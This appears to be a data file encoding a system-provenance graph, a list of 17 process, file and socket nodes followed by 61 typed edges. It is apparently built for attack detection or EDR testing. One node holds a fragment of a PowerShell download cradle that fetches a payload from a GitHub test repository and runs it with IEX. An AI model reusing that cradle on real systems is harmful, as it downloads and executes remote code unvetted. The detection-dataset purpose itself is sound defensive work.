17
MP*-nsCFA0.tmp
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TP-_vnw.exe
MF-C:\Users\admin\AppData\Local\Temp\update.exe
TP-Reader_sl.exe 
TP*-soa PDF.exe
TF-\Users\admin\AppData\Local\Temp\finance.exe
MF-C:\WINDOWS\system32\scrobj.dll
TF-\Users\admin\AppData\Local\Temp\KMSpico_setup.exe
MF-sqlwriter.exe
MF-C:\MSOCache\All
MF-tasklist.exe
TP-StormKittyBuild.exe 
MP*-n4054738.exe
MP*-vdsldr.exe
MP-nsBB14.tmp
MP-client32.exe
61
1 0 RF
0 2 IJ
2 1 ST
0 3 RD
2 3 CD
0 4 IJ
1 4 RF
2 4 IJ
4 3 WR
0 5 IJ
5 1 ST
2 5 IJ
5 3 EX
4 5 IJ
2 6 WR
4 6 WR
5 6 EX
2 7 EX
4 7 WR
5 7 WR
2 8 WR
4 8 WR
5 8 RD
2 9 CD
4 9 RD
5 9 RD
2 10 EX
4 10 WR
5 10 WR
2 11 WR
4 11 WR
5 11 WR
12 3 WR
4 12 IJ
5 12 UK
4 13 IJ
13 6 WR
13 7 WR
13 8 WR
13 9 EX
13 10 WR
13 11 WR
14 6 RD
14 7 RD
14 8 WR
14 9 WR
14 10 WR
14 11 RD
13 14 UK
15 6 WR
15 7 EX
15 8 RD
15 9 EX
15 10 WR
15 11 RD
16 7 RD
16 8 RD
16 9 RD
16 10 RD
16 11 WR
15 16 UK

